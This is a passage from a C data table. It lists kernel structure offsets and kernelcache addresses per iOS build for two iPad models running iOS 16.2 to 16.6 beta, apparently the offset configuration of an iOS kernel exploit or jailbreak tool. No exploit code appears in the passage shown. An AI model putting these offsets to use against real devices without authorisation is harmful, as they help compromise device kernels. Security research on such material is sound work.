iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8103", .build_version = "20D67", .device_id = "iPad13,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aa01190, .kernelcache__gPhysBase = 0xfffffe00079a01b0, .kernelcache__gPhysSize = 0xfffffe00079a01b0 + 8, .kernelcache__gVirtBase = 0xfffffe000799e390, .kernelcache__perfmon_devices = 0xfffffe000aa3c3b0, .kernelcache__perfmon_dev_open = 0xfffffe00080b7cc4, .kernelcache__ptov_table = 0xfffffe00078eb3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aa3b800, .kernelcache__vm_pages = 0xfffffe00078e80d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078ea368, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aa3b7f8, .kernelcache__vn_kqfilter = 0xfffffe000810a280, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:40:42 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8103", .build_version = "20E246", .device_id = "iPad13,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aacd208, .kernelcache__gPhysBase = 0xfffffe0007a7ffc0, .kernelcache__gPhysSize = 0xfffffe0007a7ffc0 + 8, .kernelcache__gVirtBase = 0xfffffe0007a7e198, .kernelcache__perfmon_devices = 0xfffffe000ab0b520, .kernelcache__perfmon_dev_open = 0xfffffe00080d03c0, .kernelcache__ptov_table = 0xfffffe00079cb188, .kernelcache__vm_first_phys_ppnum = 0xfffffe000ab0a990, .kernelcache__vm_pages = 0xfffffe00079c7eb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079ca128, .kernelcache__vm_page_array_ending_addr = 0xfffffe000ab0a988, .kernelcache__vn_kqfilter = 0xfffffe000811f2b4, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:40:42 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8103", .build_version = "20E252", .device_id = "iPad13,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aacd208, .kernelcache__gPhysBase = 0xfffffe0007a7ffc0, .kernelcache__gPhysSize = 0xfffffe0007a7ffc0 + 8, .kernelcache__gVirtBase = 0xfffffe0007a7e198, .kernelcache__perfmon_devices = 0xfffffe000ab0b520, .kernelcache__perfmon_dev_open = 0xfffffe00080d03c0, .kernelcache__ptov_table = 0xfffffe00079cb188, .kernelcache__vm_first_phys_ppnum = 0xfffffe000ab0a990, .kernelcache__vm_pages = 0xfffffe00079c7eb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079ca128, .kernelcache__vm_page_array_ending_addr = 0xfffffe000ab0a988, .kernelcache__vn_kqfilter = 0xfffffe000811f2b4, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:54 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8103", .build_version = "20F66", .device_id = "iPad13,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aad5288, .kernelcache__gPhysBase = 0xfffffe0007a84100, .kernelcache__gPhysSize = 0xfffffe0007a84100 + 8, .kernelcache__gVirtBase = 0xfffffe0007a822d8, .kernelcache__perfmon_devices = 0xfffffe000ab13520, .kernelcache__perfmon_dev_open = 0xfffffe00080d45c0, .kernelcache__ptov_table = 0xfffffe00079cf188, .kernelcache__vm_first_phys_ppnum = 0xfffffe000ab12990, .kernelcache__vm_pages = 0xfffffe00079cbeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079ce128, .kernelcache__vm_page_array_ending_addr = 0xfffffe000ab12988, .kernelcache__vn_kqfilter = 0xfffffe000812374c, }, // iOS 16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:17:58 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8103", .build_version = "20G5026e", .device_id = "iPad13,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000ab85ab0, .kernelcache__gPhysBase = 0xfffffe0007a982a8, .kernelcache__gPhysSize = 0xfffffe0007a982a8 + 8, .kernelcache__gVirtBase = 0xfffffe0007a96460, .kernelcache__perfmon_devices = 0xfffffe000abc5550, .kernelcache__perfmon_dev_open = 0xfffffe00080f8dfc, .kernelcache__ptov_table = 0xfffffe00079e39c8, .kernelcache__vm_first_phys_ppnum = 0xfffffe000abc4910, .kernelcache__vm_pages = 0xfffffe00079e0108, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079e2968, .kernelcache__vm_page_array_ending_addr = 0xfffffe000abc4908, .kernelcache__vn_kqfilter = 0xfffffe0008147958, }, // iPad Pro 11 inch 5th // // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:09:33 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8103", .build_version = "20C65", .device_id = "iPad13,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a9f5190, .kernelcache__gPhysBase = 0xfffffe00079a00c8, .kernelcache__gPhysSize = 0xfffffe00079a00c8 + 8, .kernelcache__gVirtBase = 0xfffffe000799e2a8, .kernelcache__perfmon_devices = 0xfffffe000aa303b0, .kernelcache__perfmon_dev_open = 0xfffffe00080b7f50, .kernelcache__ptov_table = 0xfffffe00078eb378, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aa2f800, .kernelcache__vm_pages = 0xfffffe00078e8090, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078ea328, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aa2f7f8, .kernelcache__vn_kqfilter = 0xfffffe000810a50c, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8103", .build_version = "20D47", .device_id = "iPad13,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aa01190, .kernelcache__gPhysBase = 0xfffffe00079a01b0, .kernelcache__gPhysSize = 0xfffffe00079a01b0 + 8, .kernelcache__gVirtBase = 0xfffffe000799e390, .kernelcache__perfmon_devices = 0xfffffe000aa3c3b0, .kernelcache__perfmon_dev_open = 0xfffffe00080b7cc4, .kernelcache__ptov_table = 0xfffffe00078eb3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aa3b800, .kernelcache__vm_pages = 0xfffffe00078e80d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078ea368, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aa3b7f8, .kernelcache__vn_kqfilter = 0xfffffe000810a280, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8103", .build_version = "20D67", .device_id = "iPad13,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aa01190, .kernelcache__gPhysBase = 0xfffffe00079a01b0, .kernelcache__gPhysSize = 0xfffffe00079a01b0 + 8, .kernelcache__gVirtBase = 0xfffffe000799e390, .kernelcache__perfmon_devices = 0xfffffe000aa3c3b0, .kernelcache__perfmon_dev_open = 0xfffffe00080b7cc4, .kernelcache__ptov_table = 0xfffffe00078eb3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aa3b800, .kernelcache__vm_pages = 0xfffffe00078e80d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078ea368, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aa3b7f8, .kernelcache__vn_kqfilter = 0xfffffe000810a280, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:40:42 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8103", .build_version = "20E246", .device_id = "iPad13,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, 